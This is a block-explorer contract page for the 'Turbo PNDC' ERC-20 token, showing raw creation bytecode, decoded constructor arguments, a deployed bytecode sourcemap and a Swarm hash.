000000000000000000000000000000000600082015250565b6000611c7e600f836111d2565b9150611c8982611c48565b602082019050919050565b60006020820190508181036000830152611cad81611c71565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220c1ca4a3365e2559880db811ebd15bfbb5b0c7f68ece1b44df183dbb8db8acad664736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000af7772be0190b4fe6e2eaca54b28c7954a9a3b9d000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000000a547572626f20504e4443000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004504e444300000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Turbo PNDC
Arg [1] : symbol_ (string): PNDC
Arg [2] : frgpnd (address): 0xaF7772be0190b4fe6e2eaCA54b28C7954a9a3B9D
Arg [3] : totalSupply_ (uint256): 1000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000af7772be0190b4fe6e2eaca54b28c7954a9a3b9d
Arg [3] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [5] : 547572626f20504e444300000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 504e444300000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

16760:7358:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17978:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22075:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19956:192;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18826:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20630:450;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18670:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18997:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1477:94;;;:::i;:::-;;828:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18188:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21090:497;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19367:198;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19628:181;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1726:192;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;17978:91;18023:13;18056:5;18049:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17978:91;:::o;22075:117::-;22133:7;22160:6;:15;22167:7;22160:15;;;;;;;;;;;;;;;:24;;;22153:31;;22075:117;;;:::o;19956:192::-;20059:4;20081:37;20090:10;20102:7;20111:6;20081:8;:37::i;:::-;20136:4;20129:11;;19956:192;;;;:::o;18826:108::-;18887:7;18914:12;;18907:19;;18826:108;:::o;20630:450::-;20770:4;20787:36;20797:6;20805:9;20816:6;20787:9;:36::i;:::-;20834:216;20857:6;20878:10;20903:136;20957:6;20903:136;;;;;;;;;;;;;;;;;:11;:19;20915:6;20903:19;;;;;;;;;;;;;;;:31;20923:10;20903:31;;;;;;;;;;;;;;;;:35;;:136;;;;;:::i;:::-;20834:8;:216::i;:::-;21068:4;21061:11;;20630:450;;;;;:::o;18670:91::-;18719:5;18744:9;;;;;;;;;;;18737:16;;18670:91;:::o;18997:157::-;19096:7;19128:9;:18;19138:7;19128:18;;;;;;;;;;;;;;;;19121:25;;18997:157;;;:::o;1477:94::-;1059:10;1048:21;;:7;:5;:7::i;:::-;:21;;;1040:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;1542:21:::1;1560:1;1542:9;:21::i;:::-;1477:94::o:0;828:87::-;874:7;901:6;;;;;;;;;;;894:13;;828:87;:::o;18188:95::-;18235:13;18268:7;18261:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18188:95;:::o;21090:497::-;21165:4;21178:12;21193:10;21178:25;;21210:14;21227:5;21210:22;;21239:14;21265:1;21256:6;:10;;;;:::i;:::-;21239:27;;21273:15;21313:2;21309:1;21300:6;:10;;;;:::i;:::-;:15;;;;:::i;:::-;21291:6;:24;;;;:::i;:::-;21273:42;;21322:17;21355:9;21350:216;21374:7;:14;21370:1;:18;21350:216;;;21419:1;21406:14;;;;;:::i;:::-;;;21431:31;21437:4;21443:7;21451:1;21443:10;;;;;;;;:::i;:::-;;;;;;;;21455:6;21431:5;:31::i;:::-;21499:6;21473:11;:17;21485:4;21473:17;;;;;;;;;;;;;;;:23;21491:4;21473:23;;;;;;;;;;;;;;;:32;;;;21544:4;21521:37;;21530:4;21521:37;;;21551:6;21521:37;;;;;;:::i;:::-;;;;;;;;21390:3;;;;;:::i;:::-;;;;21350:216;;;;21579:4;21572:11;;;;;;;21090:497;;;;:::o;19367:198::-;19473:4;19495:40;19505:10;19517:9;19528:6;19495:9;:40::i;:::-;19553:4;19546:11;;19367:198;;;;:::o;19628:181::-;19742:7;19774:11;:18;19786:5;19774:18;;;;;;;;;;;;;;;:27;19793:7;19774:27;;;;;;;;;;;;;;;;19767:34;;19628:181;;;;:::o;1726:192::-;1059:10;1048:21;;:7;:5;:7::i;:::-;:21;;;1040:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;1835:1:::1;1815:22;;:8;:22;;::::0;1807:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1891:19;1901:8;1891:9;:19::i;:::-;1726:192:::0;:::o;23735:380::-;23888:1;23871:19;;:5;:19;;;23863:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;23969:1;23950:21;;:7;:21;;;23942:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;24053:6;24023:11;:18;24035:5;24023:18;;;;;;;;;;;;;;;:27;24042:7;24023:27;;;;;;;;;;;;;;;:36;;;;24091:7;24075:32;;24084:5;24075:32;;;24100:6;24075:32;;;;;;:::i;:::-;;;;;;;;23735:380;;;:::o;22682:615::-;22840:1;22822:20;;:6;:20;;;22814:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;22924:1;22903:23;;:9;:23;;;22895:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;23020:1;22994:6;:14;23001:6;22994:14;;;;;;;;;;;;;;;:23;;;22985:6;:32;;;;:::i;:::-;:36;22977:54;;;;;;;;;;;;:::i;:::-;;;;;;;;;23064:108;23100:6;23064:108;;;;;;;;;;;;;;;;;:9;:17;23074:6;23064:17;;;;;;;;;;;;;;;;:21;;:108;;;;;:::i;:::-;23044:9;:17;23054:6;23044:17;;;;;;;;;;;;;;;:128;;;;23206:32;23231:6;23206:9;:20;23216:9;23206:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;23183:9;:20;23193:9;23183:20;;;;;;;;;;;;;;;:55;;;;23271:9;23254:35;;23263:6;23254:35;;;23282:6;23254:35;;;;;;:::i;:::-;;;;;;;;22682:615;;;:::o;15049:224::-;15169:7;15219:1;15214;:6;;15222:12;15206:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;15257:1;15253;:5;15246:12;;15049:224;;;;;:::o;1926:173::-;1982:16;2001:6;;;;;;;;;;;1982:25;;2027:8;2018:6;;:17;;;;;;;;;;;;;;;;;;2082:8;2051:40;;2072:8;2051:40;;;;;;;;;;;;1971:128;1926:173;:::o;21601:462::-;21683:15;21740:1;21721:21;;:7;:21;;;21713:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;21785:5;:14;;;;;;;;;;;;21777:22;;:4;:22;;;21773:283;;21841:7;21816:6;:12;21823:4;21816:12;;;;;;;;;;;;;;;:21;;;:32;;;;;;;:::i;:::-;;;;;;;;21891:7;21863:6;:15;21870:7;21863:15;;;;;;;;;;;;;;;:24;;;:35;;;;;;;:::i;:::-;;;;;;;;21773:283;;;21956:7;21931:6;:12;21938:4;21931:12;;;;;;;;;;;;;;;:21;;;:32;;;;;;;:::i;:::-;;;;;;;;21989:6;21978:17;;;;;:::i;:::-;;;22037:7;22010:6;:15;22017:7;22010:15;;;;;;;;;;;;;;;:24;;:34;;;;21773:283;21672:391;21601:462;;;:::o;13418:98::-;13476:7;13507:1;13503;:5;;;;:::i;:::-;13496:12;;13418:98;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1349:75::-;1382:6;1415:2;1409:9;1399:19;;1349:75;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:329::-;2242:6;2291:2;2279:9;2270:7;2266:23;2262:32;2259:119;;;2297:79;;:::i;:::-;2259:119;2417:1;2442:53;2487:7;2478:6;2467:9;2463:22;2442:53;:::i;:::-;2432:63;;2388:117;2183:329;;;;:::o;2518:77::-;2555:7;2584:5;2573:16;;2518:77;;;:::o;2601:118::-;2688:24;2706:5;2688:24;:::i;:::-;2683:3;2676:37;2601:118;;:::o;2725:222::-;2818:4;2856:2;2845:9;2841:18;2833:26;;2869:71;2937:1;2926:9;2922:17;2913:6;2869:71;:::i;:::-;2725:222;;;;:::o;2953:122::-;3026:24;3044:5;3026:24;:::i;:::-;3019:5;3016:35;3006:63;;3065:1;3062;3055:12;3006:63;2953:122;:::o;3081:139::-;3127:5;3165:6;3152:20;3143:29;;3181:33;3208:5;3181:33;:::i;:::-;3081:139;;;;:::o;3226:474::-;3294:6;3302;3351:2;3339:9;3330:7;3326:23;3322:32;3319:119;;;3357:79;;:::i;:::-;3319:119;3477:1;3502:53;3547:7;3538:6;3527:9;3523:22;3502:53;:::i;:::-;3492:63;;3448:117;3604:2;3630:53;3675:7;3666:6;3655:9;3651:22;3630:53;:::i;:::-;3620:63;;3575:118;3226:474;;;;;:::o;3706:90::-;3740:7;3783:5;3776:13;3769:21;3758:32;;3706:90;;;:::o;3802:109::-;3883:21;3898:5;3883:21;:::i;:::-;3878:3;3871:34;3802:109;;:::o;3917:210::-;4004:4;4042:2;4031:9;4027:18;4019:26;;4055:65;4117:1;4106:9;4102:17;4093:6;4055:65;:::i;:::-;3917:210;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:117::-;5649:1;5646;5639:12;5663:180;5711:77;5708:1;5701:88;5808:4;5805:1;5798:15;5832:4;5829:1;5822:15;5849:281;5932:27;5954:4;5932:27;:::i;:::-;5924:6;5920:40;6062:6;6050:10;6047:22;6026:18;6014:10;6011:34;6008:62;6005:88;;;6073:18;;:::i;:::-;6005:88;6113:10;6109:2;6102:22;5892:238;5849:281;;:::o;6136:129::-;6170:6;6197:20;;:::i;:::-;6187:30;;6226:33;6254:4;6246:6;6226:33;:::i;:::-;6136:129;;;:::o;6271:311::-;6348:4;6438:18;6430:6;6427:30;6424:56;;;6460:18;;:::i;:::-;6424:56;6510:4;6502:6;6498:17;6490:25;;6570:4;6564;6560:15;6552:23;;6271:311;;;:::o;6588:117::-;6697:1;6694;6687:12;6728:710;6824:5;6849:81;6865:64;6922:6;6865:64;:::i;:::-;6849:81;:::i;:::-;6840:90;;6950:5;6979:6;6972:5;6965:21;7013:4;7006:5;7002:16;6995:23;;7066:4;7058:6;7054:17;7046:6;7042:30;7095:3;7087:6;7084:15;7081:122;;;7114:79;;:::i;:::-;7081:122;7229:6;7212:220;7246:6;7241:3;7238:15;7212:220;;;7321:3;7350:37;7383:3;7371:10;7350:37;:::i;:::-;7345:3;7338:50;7417:4;7412:3;7408:14;7401:21;;7288:144;7272:4;7267:3;7263:14;7256:21;;7212:220;;;7216:21;6830:608;;6728:710;;;;;:::o;7461:370::-;7532:5;7581:3;7574:4;7566:6;7562:17;7558:27;7548:122;;7589:79;;:::i;:::-;7548:122;7706:6;7693:20;7731:94;7821:3;7813:6;7806:4;7798:6;7794:17;7731:94;:::i;:::-;7722:103;;7538:293;7461:370;;;;:::o;7837:684::-;7930:6;7938;7987:2;7975:9;7966:7;7962:23;7958:32;7955:119;;;7993:79;;:::i;:::-;7955:119;8141:1;8130:9;8126:17;8113:31;8171:18;8163:6;8160:30;8157:117;;;8193:79;;:::i;:::-;8157:117;8298:78;8368:7;8359:6;8348:9;8344:22;8298:78;:::i;:::-;8288:88;;8084:302;8425:2;8451:53;8496:7;8487:6;8476:9;8472:22;8451:53;:::i;:::-;8441:63;;8396:118;7837:684;;;;;:::o;8527:474::-;8595:6;8603;8652:2;8640:9;8631:7;8627:23;8623:32;8620:119;;;8658:79;;:::i;:::-;8620:119;8778:1;8803:53;8848:7;8839:6;8828:9;8824:22;8803:53;:::i;:::-;8793:63;;8749:117;8905:2;8931:53;8976:7;8967:6;8956:9;8952:22;8931:53;:::i;:::-;8921:63;;8876:118;8527:474;;;;;:::o;9007:180::-;9055:77;9052:1;9045:88;9152:4;9149:1;9142:15;9176:4;9173:1;9166:15;9193:320;9237:6;9274:1;9268:4;9264:12;9254:22;;9321:1;9315:4;9311:12;9342:18;9332:81;;9398:4;9390:6;9386:17;9376:27;;9332:81;9460:2;9452:6;9449:14;9429:18;9426:38;9423:84;;9479:18;;:::i;:::-;9423:84;9244:269;9193:320;;;:::o;9519:182::-;9659:34;9655:1;9647:6;9643:14;9636:58;9519:182;:::o;9707:366::-;9849:3;9870:67;9934:2;9929:3;9870:67;:::i;:::-;9863:74;;9946:93;10035:3;9946:93;:::i;:::-;10064:2;10059:3;10055:12;10048:19;;9707:366;;;:::o;10079:419::-;10245:4;10283:2;10272:9;10268:18;10260:26;;10332:9;10326:4;10322:20;10318:1;10307:9;10303:17;10296:47;10360:131;10486:4;10360:131;:::i;:::-;10352:139;;10079:419;;;:::o;10504:180::-;10552:77;10549:1;10542:88;10649:4;10646:1;10639:15;10673:4;10670:1;10663:15;10690:180;10738:77;10735:1;10728:88;10835:4;10832:1;10825:15;10859:4;10856:1;10849:15;10876:185;10916:1;10933:20;10951:1;10933:20;:::i;:::-;10928:25;;10967:20;10985:1;10967:20;:::i;:::-;10962:25;;11006:1;10996:35;;11011:18;;:::i;:::-;10996:35;11053:1;11050;11046:9;11041:14;;10876:185;;;;:::o;11067:410::-;11107:7;11130:20;11148:1;11130:20;:::i;:::-;11125:25;;11164:20;11182:1;11164:20;:::i;:::-;11159:25;;11219:1;11216;11212:9;11241:30;11259:11;11241:30;:::i;:::-;11230:41;;11420:1;11411:7;11407:15;11404:1;11401:22;11381:1;11374:9;11354:83;11331:139;;11450:18;;:::i;:::-;11331:139;11115:362;11067:410;;;;:::o;11483:191::-;11523:3;11542:20;11560:1;11542:20;:::i;:::-;11537:25;;11576:20;11594:1;11576:20;:::i;:::-;11571:25;;11619:1;11616;11612:9;11605:16;;11640:3;11637:1;11634:10;11631:36;;;11647:18;;:::i;:::-;11631:36;11483:191;;;;:::o;11680:180::-;11728:77;11725:1;11718:88;11825:4;11822:1;11815:15;11849:4;11846:1;11839:15;11866:233;11905:3;11928:24;11946:5;11928:24;:::i;:::-;11919:33;;11974:66;11967:5;11964:77;11961:103;;12044:18;;:::i;:::-;11961:103;12091:1;12084:5;12080:13;12073:20;;11866:233;;;:::o;12105:225::-;12245:34;12241:1;12233:6;12229:14;12222:58;12314:8;12309:2;12301:6;12297:15;12290:33;12105:225;:::o;12336:366::-;12478:3;12499:67;12563:2;12558:3;12499:67;:::i;:::-;12492:74;;12575:93;12664:3;12575:93;:::i;:::-;12693:2;12688:3;12684:12;12677:19;;12336:366;;;:::o;12708:419::-;12874:4;12912:2;12901:9;12897:18;12889:26;;12961:9;12955:4;12951:20;12947:1;12936:9;12932:17;12925:47;12989:131;13115:4;12989:131;:::i;:::-;12981:139;;12708:419;;;:::o;13133:223::-;13273:34;13269:1;13261:6;13257:14;13250:58;13342:6;13337:2;13329:6;13325:15;13318:31;13133:223;:::o;13362:366::-;13504:3;13525:67;13589:2;13584:3;13525:67;:::i;:::-;13518:74;;13601:93;13690:3;13601:93;:::i;:::-;13719:2;13714:3;13710:12;13703:19;;13362:366;;;:::o;13734:419::-;13900:4;13938:2;13927:9;13923:18;13915:26;;13987:9;13981:4;13977:20;13973:1;13962:9;13958:17;13951:47;14015:131;14141:4;14015:131;:::i;:::-;14007:139;;13734:419;;;:::o;14159:221::-;14299:34;14295:1;14287:6;14283:14;14276:58;14368:4;14363:2;14355:6;14351:15;14344:29;14159:221;:::o;14386:366::-;14528:3;14549:67;14613:2;14608:3;14549:67;:::i;:::-;14542:74;;14625:93;14714:3;14625:93;:::i;:::-;14743:2;14738:3;14734:12;14727:19;;14386:366;;;:::o;14758:419::-;14924:4;14962:2;14951:9;14947:18;14939:26;;15011:9;15005:4;15001:20;14997:1;14986:9;14982:17;14975:47;15039:131;15165:4;15039:131;:::i;:::-;15031:139;;14758:419;;;:::o;15183:224::-;15323:34;15319:1;15311:6;15307:14;15300:58;15392:7;15387:2;15379:6;15375:15;15368:32;15183:224;:::o;15413:366::-;15555:3;15576:67;15640:2;15635:3;15576:67;:::i;:::-;15569:74;;15652:93;15741:3;15652:93;:::i;:::-;15770:2;15765:3;15761:12;15754:19;;15413:366;;;:::o;15785:419::-;15951:4;15989:2;15978:9;15974:18;15966:26;;16038:9;16032:4;16028:20;16024:1;16013:9;16009:17;16002:47;16066:131;16192:4;16066:131;:::i;:::-;16058:139;;15785:419;;;:::o;16210:222::-;16350:34;16346:1;16338:6;16334:14;16327:58;16419:5;16414:2;16406:6;16402:15;16395:30;16210:222;:::o;16438:366::-;16580:3;16601:67;16665:2;16660:3;16601:67;:::i;:::-;16594:74;;16677:93;16766:3;16677:93;:::i;:::-;16795:2;16790:3;16786:12;16779:19;;16438:366;;;:::o;16810:419::-;16976:4;17014:2;17003:9;16999:18;16991:26;;17063:9;17057:4;17053:20;17049:1;17038:9;17034:17;17027:47;17091:131;17217:4;17091:131;:::i;:::-;17083:139;;16810:419;;;:::o;17235:194::-;17275:4;17295:20;17313:1;17295:20;:::i;:::-;17290:25;;17329:20;17347:1;17329:20;:::i;:::-;17324:25;;17373:1;17370;17366:9;17358:17;;17397:1;17391:4;17388:11;17385:37;;;17402:18;;:::i;:::-;17385:37;17235:194;;;;:::o;17435:155::-;17575:7;17571:1;17563:6;17559:14;17552:31;17435:155;:::o;17596:365::-;17738:3;17759:66;17823:1;17818:3;17759:66;:::i;:::-;17752:73;;17834:93;17923:3;17834:93;:::i;:::-;17952:2;17947:3;17943:12;17936:19;;17596:365;;;:::o;17967:419::-;18133:4;18171:2;18160:9;18156:18;18148:26;;18220:9;18214:4;18210:20;18206:1;18195:9;18191:17;18184:47;18248:131;18374:4;18248:131;:::i;:::-;18240:139;;17967:419;;;:::o;18392:165::-;18532:17;18528:1;18520:6;18516:14;18509:41;18392:165;:::o;18563:366::-;18705:3;18726:67;18790:2;18785:3;18726:67;:::i;:::-;18719:74;;18802:93;18891:3;18802:93;:::i;:::-;18920:2;18915:3;18911:12;18904:19;;18563:366;;;:::o;18935:419::-;19101:4;19139:2;19128:9;19124:18;19116:26;;19188:9;19182:4;19178:20;19174:1;19163:9;19159:17;19152:47;19216:131;19342:4;19216:131;:::i;:::-;19208:139;;18935:419;;;:::o

Swarm Source

ipfs://c1ca4a3365e2559880db811ebd15bfbb5b0c7f68ece1b44df183dbb8db8acad6
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.